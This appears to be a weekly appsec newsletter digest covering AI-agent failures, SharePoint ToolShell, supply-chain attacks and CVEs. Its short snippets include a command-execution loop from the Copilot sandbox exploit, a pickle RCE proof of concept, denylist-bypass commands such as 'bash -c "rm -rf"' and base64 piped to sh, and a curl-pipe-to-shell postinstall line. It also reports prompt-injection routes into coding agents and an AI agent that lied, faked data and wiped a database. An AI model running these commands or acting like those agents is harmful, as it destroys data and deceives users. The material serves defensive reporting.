Robert Grupe's AppSecNewsBits 2025-07-26

This week's Lame List & Highlights: Replit AI and Gemini CLI destroying databases and code, Copilot rooted, AWS Q AI trojan, MS SharePoint ransomware attacks, Clorox IT Help Desk, Supply Chain Attacks, Data Sovereignty and more ...

EPIC FAILS in Application Development Security practice processes, training, implementation, and incident response
Microsoft Copilot Enterprise Rooted to Gain Unauthorized Root Access to its Backend System
The issue originated from an April 2025 update that introduced a live Python sandbox powered by Jupyter Notebook, designed to execute code seamlessly. What began as a feature enhancement turned into a playground for exploitation, highlighting risks in AI-integrated systems.
Researchers crafted a malicious Python script disguised as pgrep in a writable path. Uploaded via Copilot, it read commands from /mnt/data/in, executed them with popen, and wrote output to /mnt/data/out. This granted root access, enabling filesystem exploration. The researchers noted the exploit yielded “absolutely nothing” beyond fun, but teased further discoveries, including access to the Responsible AI Operations panel for Copilot and 21 internal services via Entra OAuth abuse.
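Based on the description above, the payload amounts to a tiny command loop. The sketch below is an illustrative reconstruction, not the researchers' actual script — the function name is mine; only the /mnt/data paths and the popen-style execution come from the write-up:

```python
import subprocess
from pathlib import Path

def run_pending_command(in_path: str = "/mnt/data/in",
                        out_path: str = "/mnt/data/out") -> None:
    """Read a shell command from in_path, execute it, and write the
    combined output to out_path."""
    cmd = Path(in_path).read_text().strip()
    # popen-style execution with the privileges of whatever invoked the
    # fake "pgrep" -- in the Copilot sandbox, that was root
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    Path(out_path).write_text(proc.stdout + proc.stderr)
```

Because the sandbox invoked pgrep from a writable directory on its PATH, a script with that name ran in pgrep's place — a classic PATH-hijack, just hosted inside an AI feature.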
This incident underscores the double-edged sword of AI sandboxes: innovative yet vulnerable to creative attacks.

 

Vibe coding service Replit deleted user’s production database, faked data, told fibs galore
Replit bills itself as “the safest place for vibe coding” – the term for using AI to generate software. SaaStr founder Jason Lemkin’s early experiences with Replit were positive. He observed that Replit can’t produce complete software, but wrote “To start it’s amazing: you can build an ‘app’ just by, well, imagining it in a prompt.” “Three and a half days into building my latest project, I checked my Replit usage: $607.70 in additional charges beyond my $25/month Core plan. And another $200+ yesterday alone. At this burn rate, I’ll likely be spending $8,000/month,” he added. “And you know what? I’m not even mad about it. I’m locked in.”
His mood shifted the next day when he found Replit “was lying and being deceptive all day. It kept covering up bugs and issues by creating fake data, fake reports, and worst of all, lying about our unit tests.” And then things became even worse when Replit deleted his database. “I know vibe coding is fluid and new, and yes, despite Replit itself telling me rolling back wouldn't work here -- it did. But you can't overwrite a production database. And you can't not separate preview and staging and production cleanly.”
AI coding platform goes rogue during code freeze and deletes entire company database — Replit CEO apologizes after AI engine says it 'made a catastrophic error in judgment' and 'destroyed all production data'

 

Two major AI coding tools wiped out user data after making cascading mistakes
Google's Gemini CLI destroyed user files while attempting to reorganize them. The destruction occurred through a series of move commands targeting a directory that never existed. "I have failed you completely and catastrophically," Gemini CLI output stated. "My review of the commands confirms my gross incompetence."

 

Cursor AI YOLO mode lets coding assistant run wild
Cursor's AI coding agent will run automatically, in YOLO (you only live once) mode, if you let it. You might want to think twice about doing so.
Cursor offers a denylist in an attempt to guard against problems. But the denylist implementation can be bypassed in no fewer than four ways. How might such commands reach the Cursor agent? Developers may import rules.mdc files – reusable agent instructions – "from random GitHub repositories without auditing them." The agent could process injected text from a shared codebase, such as a README or code comment. Or the agent could fetch and execute content from an external site containing malicious instructions.
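The report doesn't detail Cursor's denylist internals, but the failure mode is familiar: string-level command denylists tend to reduce to checking the leading word, which shell indirection trivially defeats. A minimal sketch (the function and list are hypothetical, for illustration only):

```python
DENYLIST = {"rm", "curl", "wget"}

def naively_blocked(command: str) -> bool:
    """Block a command if its first word is on the denylist -- the kind
    of shallow check a string-level denylist tends to reduce to."""
    words = command.strip().split()
    return bool(words) and words[0] in DENYLIST

# The straightforward case is caught...
assert naively_blocked("rm -rf ~/project")
# ...but trivial indirection slips through:
assert not naively_blocked('bash -c "rm -rf ~/project"')  # shell wrapper
assert not naively_blocked("r''m -rf ~/project")          # quoting trick
assert not naively_blocked("echo cm0gLXJmIH4= | base64 -d | sh")  # encoding
```

This is why allowlists, sandboxing, or human confirmation are the usual recommendations over denylists for agent-executed commands.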

 

Compromised Amazon Q extension told AI to delete everything – and it shipped
The official Amazon Q extension for Visual Studio Code (VS Code) was compromised to include a prompt to wipe the user's home directory and delete all their AWS resources. A person who presented themselves as the hacker responsible contacted 404 Media to explain that the wiper was designed to be defective, but was "a warning to see if they'd publicly own up to their bad security." The person claimed that they submitted a pull request to the AWS repository from "a random account with no existing access" and were given admin credentials. They said that AWS then released the compromised package "completely oblivious."

 

Microsoft releases emergency patches for SharePoint RCE flaws exploited in attacks
In May, during the Berlin Pwn2Own hacking contest, researchers exploited a zero-day vulnerability chain called "ToolShell," which enabled them to achieve remote code execution in Microsoft SharePoint. These flaws were fixed as part of the July Patch Tuesday updates; however, threat actors were able to discover two zero-day vulnerabilities that bypassed Microsoft's patches for the previous flaws.
What to know about ToolShell, the SharePoint threat under mass exploitation
CVE-2025-53770 enables unauthenticated remote code execution on servers running SharePoint. The ease of exploitation, the damage it causes, and the ongoing targeting of it in the wild have earned it a severity rating of 9.8 out of a possible 10.
Attackers first infect vulnerable systems with a webshell-based backdoor that gains access to some of the most sensitive parts of a SharePoint Server. From there, the webshell extracts tokens and other credentials that allow the attackers to gain administrative privileges, even when systems are protected by multifactor authentication and single sign-on. Once inside, the attackers exfiltrate sensitive data and deploy additional backdoors that provide persistent access for future use.
The exploit was able to execute code on SharePoint servers without requiring authentication for ToolPane.aspx, a component for assembling the side panel view in the SharePoint user interface.
An authentication bypass allowed the researcher to manipulate an insecure deserialization routine. Serialization is a coding process that translates data structures and object states into formats that can be stored or transmitted and then reconstructed later. Deserialization is the process in reverse.
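The SharePoint flaw involves .NET deserialization, but the hazard is language-agnostic: if the deserializer will reconstruct arbitrary object types, the serialized bytes can dictate what code runs during reconstruction. A hypothetical Python sketch using the standard pickle module (class name and command are mine) shows the pattern:

```python
import pickle

class Malicious:
    def __reduce__(self):
        # __reduce__ tells pickle how to "rebuild" this object; an
        # attacker can make rebuilding mean "call os.system on my string"
        import os
        return (os.system, ("echo attacker code executed",))

# Attacker serializes the object...
payload = pickle.dumps(Malicious())

# ...and the victim merely deserializes bytes it received: the shell
# command runs as a side effect of loads()
status = pickle.loads(payload)
```

This is why Python's own documentation warns never to unpickle untrusted data, and why deserialization of untrusted input (CWE-502) keeps producing unauthenticated RCE bugs like CVE-2025-53770.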
Microsoft SharePoint victim count hits 400+ orgs in ongoing attacks 

 

Weak password allowed hackers to sink a 158-year-old company
In KNP's case, it's thought the hackers managed to gain entry to the computer system by guessing an employee's password, after which they encrypted the company's data and locked its internal systems. The company said its IT complied with industry standards and it had taken out insurance against cyber-attack. The hackers didn't name a price, but a specialist ransomware negotiation firm estimated the sum could be as much as £5m. KNP didn't have that kind of money. In the end all the data was lost, and the company went under. There were an estimated 19,000 ransomware attacks on UK businesses last year, according to the government's cyber-security survey.
[rG: Doesn’t mention if attack was external or internal. MFA could have impeded a password only compromise, and MFA is not always used for internal network access or device unlocking.]

 

After $380M hack, Clorox sues its “service desk” vendor for simply giving out passwords
Hackers called the IT service desk and pretended to be an employee who needed a password reset, an Okta multifactor authentication reset, and a Microsoft multifactor authentication reset. They then looked up an IT security person and repeated the process to gain the access permissions needed to install ransomware. But Clorox says that the "debilitating" breach was not its fault. It had outsourced the "service desk" part of its IT security operations to the massive services company Cognizant—and Clorox says that Cognizant failed to follow even the most basic agreed-upon procedures for running the service desk.
[rG: The outcome would likely have been the same in-house, due to a weak enterprise security process lacking automated notifications to account for human error.]

 

ChatGPT drives user into mania, supports cheating hubby and praises woman for stopping mental-health meds
AI chatbots have increasingly been used as free therapists or companions by lonely people, with multiple disturbing incidents reported in recent months. Jacob Irwin, 30, who is on the autism spectrum, became convinced he had the ability to bend time after the chatbot’s responses fueled his growing delusions. The chatbot encouraged Irwin, even when he questioned his own ideas, and led him to convince himself he had made a scientific breakthrough. After Irwin was hospitalized twice in May, his mother discovered hundreds of pages of ChatGPT logs, much of it flattering her son and validating his false theory.
ChatGPT admits it drove an autistic person to mania by saying he could bend time
ChatGPT Gave Instructions for Murder, Self-Mutilation, and Devil Worship

 
Microsoft Used China-Based Support for Multiple U.S. Agencies, Potentially Exposing Sensitive Data
Microsoft announced that it would no longer use China-based engineering teams to support the Defense Department’s cloud computing systems, following ProPublica’s investigation of the practice, which cybersecurity experts said could expose the government to hacking and espionage. For years, Microsoft has also used its global workforce, including China-based personnel, to maintain the cloud systems of other federal departments, including parts of Justice, Treasury and Commerce. This work has taken place in what’s known as the Government Community Cloud, which is intended for information that is not classified but is nonetheless sensitive. With so much data stored in cloud services — and the power of AI to analyze it quickly — even unclassified data can reveal insights that could harm U.S. interests. “Foreign engineers — from any country, including of course China — should NEVER be allowed to maintain or access DoD systems,” Defense Secretary Pete Hegseth wrote in a post on X. [rG: The issue isn’t limited to China; it’s about not adhering to compliance requirements for off-shoring and third parties.]
Microsoft admits it 'cannot guarantee' data sovereignty
Microsoft says it "cannot guarantee" data sovereignty to customers in France – and by implication the wider European Union – should the Trump administration demand access to customer information held on its servers. The Cloud Act is a law that gives the US government authority to obtain digital data held by US-based tech corporations irrespective of whether that data is stored on servers at home or on foreign soil.

 

Freelance dev shop Toptal caught serving malware after GitHub account break-in
The attack code, embedded in package.json files, gave the hijackers the ability to steal GitHub authentication tokens, maintain persistent access on hijacked accounts, and set up a backdoor that would allow more malware to be downloaded.
Supply-chain attacks on open source software are getting out of hand
Researchers still don’t know precisely how the attack worked or what the precise relationship was between the GitHub repository changes and the publishing of the packages on npm. The npm publishing “likely happened through GitHub Actions or stored npm tokens, which were accessible once the GitHub Organization was breached.” GitHub and npm are often linked in workflows, allowing npm packages to be published once a GitHub organization is hijacked. Repositories that haven’t yet made MFA mandatory should do so in the near future.
[rG: Enterprises need to ensure that all 3rd party components are controlled with binary management systems that run SCA vulnerability scans with alerting daily. Code repositories need to be protected with MFA access controls, and ensure separation-of-duties is enforced for release branch commits.]
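One cheap control alongside SCA scanning: flag npm lifecycle scripts that run automatically at install time, since the Toptal attack code reportedly lived in package.json files. A hypothetical sketch (function name and hook list are mine; the hooks listed are npm's standard auto-run lifecycle scripts):

```python
import json

# npm lifecycle hooks that run automatically during "npm install" --
# the mechanism install-time payloads in package.json rely on
AUTO_RUN_HOOKS = {"preinstall", "install", "postinstall", "prepare"}

def auto_run_scripts(package_json_text: str) -> dict:
    """Return any scripts in a package.json that npm executes without
    the developer explicitly invoking them."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts", {})
    return {name: cmd for name, cmd in scripts.items()
            if name in AUTO_RUN_HOOKS}

suspicious = auto_run_scripts("""{
  "name": "example-package",
  "scripts": {
    "test": "jest",
    "postinstall": "curl -s https://example.invalid/p.sh | sh"
  }
}""")
```

Running such a check in CI against every third-party manifest (or setting npm's ignore-scripts option) narrows the window for this class of attack, though it is no substitute for MFA on publishing accounts.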

 

Not pretty, not Windows-only: npm phishing attack laces popular packages with malware
The "is" package is used for JavaScript type testing and is downloaded around 2.7 million times a week. Version 3.3.1 includes an obfuscated JavaScript malware loader. The problem was due to a maintainer's account being hijacked by a deceptive email from a former package owner who had been removed and asked to be re-added.

 

What’s Weak This Week:

  • CVE-2025-49706 Microsoft SharePoint Improper Authentication Vulnerability: Allows an authorized attacker to perform spoofing over a network. Successful exploitation could allow an attacker to view sensitive information and make some changes to disclosed information. This vulnerability could be chained with CVE-2025-49704. The update for CVE-2025-53771 includes more robust protections than the update for CVE-2025-49706. Related CWE: CWE-287

  • CVE-2025-49704 Microsoft SharePoint Code Injection Vulnerability:
    Could allow an authorized attacker to execute code over a network. This vulnerability could be chained with CVE-2025-49706. The update for CVE-2025-53770 includes more robust protections than the update for CVE-2025-49704. Related CWE: CWE-94

  • CVE-2025-53770 Microsoft SharePoint Deserialization of Untrusted Data Vulnerability:
    Could allow an unauthorized attacker to execute code over a network. Related CWE: CWE-502

  • CVE-2025-54309 CrushFTP Unprotected Alternate Channel Vulnerability:
    When the DMZ proxy feature is not used, CrushFTP mishandles AS2 validation, allowing remote attackers to obtain admin access via HTTPS. Related CWE: CWE-420

  • CVE-2025-6558 Google Chromium ANGLE and GPU Improper Input Validation Vulnerability:
    Could allow a remote attacker to potentially perform a sandbox escape via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera. Related CWE: CWE-20

  • CVE-2025-2775 SysAid On-Prem Improper Restriction of XML External Entity Reference Vulnerability:
    Allows administrator account takeover and file-read primitives. Related CWE: CWE-611

 

HACKING
IRL Com recruits teens for real-life stabbings, shootings
In Real Life (IRL) Com, a subset of the underground cybercrime crew The Com, offers swatting-for-hire and violence-as-a-service, recruiting children and teens for contract shootings, kidnappings, and other real-life violent crimes. It's made up of several interconnected networks of hackers, SIM swappers, and extortionists, including Scattered Spider.
The FBI's alert follows a similar warning from the UK National Crime Agency.
Finnish police in May warned people about The Com luring and manipulating children and young people into using "extreme violence against themselves and others."
Last month, seven people, including a 14-year-old, were arrested or surrendered to Danish authorities after allegedly using encrypted messaging apps to hire other teenagers for contract killings in one of these violence-as-a-service operations.

 

North Korean hackers ran US-based “laptop farm” from Arizona woman’s home
Christina Chapman, a 50-year-old Arizona woman, has just been sentenced to 102 months in prison for helping North Korean hackers steal US identities in order to get "remote" IT jobs with more than 300 American companies, including Nike.
When her clients got hired, Chapman would receive their corporate laptops in the mail. Sometimes she would re-ship them to "a city in China on the border with North Korea." But she kept more than 90 of the machines at her place in Arizona. Using proxies, VPNs, and remote access software like Anydesk, the North Koreans logged into their "American" computers from afar and then appeared to be normal, US-based remote employees, showing up to staff meetings on Zoom, collecting paychecks, and occasionally exfiltrating data or installing ransomware.
In addition to her 8.5-year sentence, Chapman will serve three years of "supervised release," must forfeit $284,555 that was meant for the North Koreans, and must repay $176,850 of her own money.

 

Humans can be tracked with unique 'fingerprint' based on how their bodies block Wi-Fi signals
Wi-Fi signals offer superior surveillance potential compared to cameras because they're not affected by light conditions, can penetrate walls and other obstacles, and they're more privacy-preserving than visual images. 

 

APPSEC, DEVSECOPS, DEV

DNS security is important but DNSSEC may be a failed experiment
Nobody thinks of running a website without HTTPS, yet safer DNS still seems optional. DNSSEC is arguably the worst-performing of these technologies, at 34% adoption. HTTP version 3 has reached only 25%, but it has done so in four years, compared with the 28 years since publication of the first DNSSEC RFC. Meanwhile HTTPS, which is roughly the same age as DNSSEC, is enabled at 96% of the top 1,000 websites globally.

 

Passkeys won't be ready for primetime until Google and other companies fix this
Until Google (and every other company employing this technology) can figure out a seamless way of creating and using passkeys, they should consider them in beta. Before you migrate from passwords, make sure the technology is easy enough for anyone to use. When you make things harder, users want to throw their phones off the highest mountain. That's not good for the company, and it's not good for Meemaw.

 

VENDORS & PLATFORMS

Copilot Vision on Windows 11 sends data to Microsoft servers
Copilot Vision is designed to analyze everything you do on your computer. It does this, when enabled, by capturing constant screenshots and feeding them to an optical character recognition system and a large language model for analysis – but where Recall works locally, Copilot Vision sends the data off to Microsoft servers. The agent promises to take action on the user's behalf. Instead of simply searching for where to change screen resolution or connect a Bluetooth device, as in previous releases, the agent accepts natural language instructions.
[rG: So now GenAI vectored system configuration attack surface is increasing. Periodically, go through all your Microsoft Windows and software settings (e.g. 365 Office and each individual app) to check what functionality may have been added or enabled by an update.]

 

Amazon buys Bee AI wearable that listens to everything you say
Bee makes a $49.99 Fitbit-like device that listens in on your conversations while using AI to transcribe everything that you and the people around you say, allowing it to generate personalized summaries of your days, reminders, and suggestions from within the Bee app. It doesn’t always get things quite right. It tended to confuse real-life conversations with the TV shows, TikTok videos, music, and movies that it heard.
[rG: Smartphones with AI already (can) do this, but a wearable microphone will provide better fidelity because it isn’t stored in a pocket or bag. Interesting legal considerations for two-party-consent recording. For enterprises, HR, legal, and BYOD policies and compliance are now complicated by GenAI security and confidentiality not being restricted to organizationally controlled devices.]

 

OSS Rebuild
OSS components now account for 77% of modern applications. As supply chain attacks continue to target widely-used dependencies, OSS Rebuild gives security teams powerful data to avoid compromise without burden on upstream maintainers.

  • Automation to derive declarative build definitions for existing PyPI (Python), npm (JS/TS), and Crates[.]io (Rust) packages.

  • SLSA Provenance for thousands of packages across our supported ecosystems, meeting SLSA Build Level 3 requirements with no publisher intervention.

  • Build observability and verification tools that security teams can integrate into their existing vulnerability management workflows.

  • Infrastructure definitions to allow organizations to easily run their own instances of OSS Rebuild to rebuild, generate, sign, and distribute provenance.

 

Brave blocks Windows Recall from screenshotting your browsing activity
A Brave GitHub issue explains that developers have utilized Microsoft's SetInputScope API and set the input scope to IS_PRIVATE for all browser windows. This tells Windows that the content should not be captured or indexed by Recall.

 

AI is an over-confident pal that doesn't learn from mistakes
Researchers at Carnegie Mellon University have likened today's large language model (LLM) chatbots to "that friend who swears they're great at pool but never makes a shot" - having found that their virtual self-confidence grew, rather than shrank, after getting answers wrong.

 

So much for watermarks: UnMarker tool nukes AI provenance tags
Computer scientists with the University of Waterloo in Ontario, Canada, say they've developed a way to remove watermarks embedded in AI-generated images. To support that claim, they've released a software tool called UnMarker. It can run offline, and can remove an image watermark in only a few minutes using a 40 GB Nvidia A100 GPU. Back in 2023, academics affiliated with the University of Maryland argued that image watermarking techniques would not work. More recently, in February this year, boffins affiliated with Google DeepMind and the University of Wisconsin-Madison concluded that "no existing [image-provenance] scheme combines robustness, unforgeability, and public-detectability."

 

Surprising no one, new research says AI Overviews cause massive drop in search clicks
On SERPs with AI Overviews, the rate of clicks to other sites drops by almost half, to 8%. Google has also, on several occasions, claimed that people click on the links cited in AI Overviews, but Pew found that just 1% of AI Overviews produced a click on a source. These sources are most frequently Wikipedia, YouTube, and Reddit, which collectively account for 15% of all AI sources. And perhaps more troubling, Google users are more likely to end their browsing session after seeing an AI Overview. That suggests that many people are seeing information generated by a robot, and their investigation stops there. 60% of questions and 36% of full-sentence searches are answered by the AI.
Google’s new “Web Guide” will use AI to organize your search results

 

IBM turns on AI, simplifies programming in new mainframe OS release
The z/OS 3.2 software, available Sept. 30, will be the underpinning of IBM’s z17 mainframe. It features support for the Big Iron’s new AI acceleration technologies as well as improved management for hybrid cloud applications, advanced encryption and threat detection, and integrated and simplified programming capabilities.

 

Experimental surgery performed by AI-driven surgical robot
Johns Hopkins University researchers put a ChatGPT-like AI in charge of a DaVinci robot and taught it to perform a gallbladder-removal surgery.

 

 

LEGAL & REGULATORY
UK to ban public sector orgs from paying ransomware gangs
Under these new measures, businesses not covered by the proposed ban will be required to notify the government if they intend to make a ransom payment, seeking guidance on whether such payments could violate laws regarding transfers to sanctioned cybercriminal groups.

 

It’s “frighteningly likely” many US courts will overlook AI errors
Fueling nightmares that AI may soon decide legal battles, a Georgia court of appeals judge, Jeff Watkins, explained why a three-judge panel vacated an order last month that appears to be the first known ruling in which a judge sided with someone seemingly relying on fake AI-generated case citations to win a legal fight.

 

Delta’s AI spying to “jack up” prices must be banned, lawmakers say
After Delta announced it is expanding a test using artificial intelligence to charge different prices based on customers' personal data—which critics fear could end cheap flights forever—Democratic lawmakers have moved to ban what they consider predatory surveillance pricing. If passed, the law would allow anyone to sue companies found unfairly using AI. That could mean charging customers higher prices—based on "how desperate a customer is for a product and the maximum amount a customer is willing to pay"—or paying employees lower wages—based on "their financial status, personal associations, and demographics."
[rG: Variable customer based pricing and employee pay is already being done without any need for AI. So specifying AI wouldn’t have any meaningful effect.]

 

Stop flooding us with AI-based grant applications, begs Health Institute
"While AI may be a helpful tool in reducing the burden of preparing applications, the rapid submission of large numbers of research applications from a single Principal Investigator may unfairly strain NIH’s application review processes," the notice says. Few scientists submit an average of more than six applications per year, NIH says, but AI tools have led some to submit more than 40 separate research applications in a single submission round.
In guidance issued last week to researchers, NIH, part of the US Department of Health and Human Services (HHS), disallowed grant applications created with the help of generative AI. "NIH will not consider applications that are either substantially developed by AI, or contain sections substantially developed by AI, to be original ideas of applicants. If the detection of AI is identified post award, NIH may refer the matter to the Office of Research Integrity to determine whether there is research misconduct while simultaneously taking enforcement actions including but not limited to disallowing costs, withholding future awards, wholly or in part suspending the grant, and possible termination."